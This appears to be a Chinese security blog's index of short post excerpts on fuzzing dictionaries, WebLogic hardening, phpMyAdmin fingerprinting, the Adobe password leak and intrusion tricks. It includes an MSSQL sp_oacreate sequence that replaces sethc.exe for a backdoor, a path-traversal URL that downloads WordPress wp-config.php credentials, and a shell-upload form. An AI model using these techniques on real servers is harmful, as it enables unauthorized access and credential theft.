fuzz字典

https://github.com/fuzzdb-project/fuzzdb

https://fuzz.wget.lc/Fuzz/

标签:

各种信息安全思维导图

 https://github.com/phith0n/Mind-Map

标签:

中间件WebLogic服务安全加固

WebLogic是用于集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在各行业都有广泛的应用。WebLogic上部署的Web项目的后台数据库一般为Oracle数据库,数据库中往往存有大量数据,备受入侵者“青睐”。

 

标签:

加字符批处理命令

 @echo off

for /F "tokens=*" %%i in (c:\1dao4zimu.txt) do echo www.%%i.com>>c:\1.txt

标签:

识别phpmyadmin的方法

 识别phpmyadmin的方法:访问/phpmyadmin/,返回Welcome to <bdo dir="ltr" xml:lang="en">phpMyAdmin

标签:

Top 100 Adobe Passwords with Count

We do not (yet) have the keys Adobe used to encrypt the passwords of 130,324,429 users affected by their most recent breach. However, thanks to Adobe choosing symmetric key encryption over hashing, selecting ECB mode, and using the same key for every password, combined with a large number of known plaintexts and the generosity of users who flat-out gave us their password in their password hint, this is not preventing us from presenting you with this list of the top 100 passwords selected by Adobe users.

标签:

【转】sa无xp_cmdshell下提升权限简单方法

在用exec sp_oacreate ''wscript.shell''也没办法的情况下。。可用此方法
  (很多服务器都把''wscript.shell''给删了。)
  上网找了些资料,得到下面方法:
  复制文件:
  declare @o int
  exec sp_oacreate ''scripting.filesystemobject'', @o out
  exec sp_oamethod @o, ''copyfile'',null,''c:\windows\explorer.exe'' ,''c:\windows\system32\sethc.exe'';
  declare @oo int
  exec sp_oacreate ''scripting.filesystemobject'', @oo out

标签:

【转载】关于wordpress密码的破解思路

wordpress这种CMS国外用的非常多,安全性还是不错的,跟新快,看到这种东西,除了管理员架好之后就托管的垃圾站,持续更新的wordpress还是很让人头疼的。

标签:

WordPress-wp-FileManager-File-Download漏洞利用方法

漏洞详解:http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。

标签:

一段上传文件代码

Shell upload attack:
<form enctype="multipart/form-data" action="http://www.test.com/upload.php" method="post">
<input type="text" name="url" value="./" /><br />
...

标签: